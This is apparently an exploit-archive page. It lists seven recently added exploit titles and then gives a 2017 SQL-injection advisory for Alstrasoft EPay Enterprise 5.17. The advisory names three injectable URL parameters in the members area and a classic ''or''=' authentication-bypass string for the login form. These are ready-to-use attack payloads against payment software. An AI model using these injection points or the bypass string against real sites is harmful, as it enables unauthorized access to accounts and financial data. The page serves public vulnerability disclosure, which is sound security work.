
7 new exploits Debian 9 ntfs-3g - Privilege Escalation ntfs-3g (Debian 9) - Privilege Escalation Alstrasoft EPay Enterprise 5.17 - SQL Injection Alstrasoft ProTaxi Enterprise 3.5 - Arbitrary File Upload Alstrasoft e-Friends 5.12 - SQL Injection Alstrasoft Video Share Enterprise 4.72 - SQL Injection Alstrasoft Flippa Clone MarketPlace Script 4.10 - Cross-Site Request Forgery (Add Admin) Alstrasoft FMyLife Pro 1.02 - Cross-Site Request Forgery (Add Admin) Alstrasoft Forum Pay Per Post Exchange Script 2.01 - SQL Injection
21 lines
No EOL
842 B
Text
Executable file
21 lines
No EOL
842 B
Text
Executable file
# # # # #
|
|
# Exploit Title: Alstrasoft EPay Enterprise v5.17 Script - SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 04.02.2017
|
|
# Vendor Homepage: http://www.alstrasoft.com/
|
|
# Software Buy: http://www.alstrasoft.com/epay_enterprise.htm
|
|
# Demo: http://blizsoft.com/enterprise/
|
|
# Version: 5.17
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[beygir]ihsan[nokta]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/members/userinfo.htm?id=[SQL]
|
|
# http://localhost/[PATH]/members/products.htm?id=[SQL]&action=update
|
|
# http://localhost/[PATH]/members/subscriptions.htm?id=[SQL]&action=update
|
|
# Authentication Bypass :
|
|
# http://localhost/[PATH]/members/login.htm and set Username:'or''=' and Password to 'or''=' and hit enter.
|
|
# # # # # |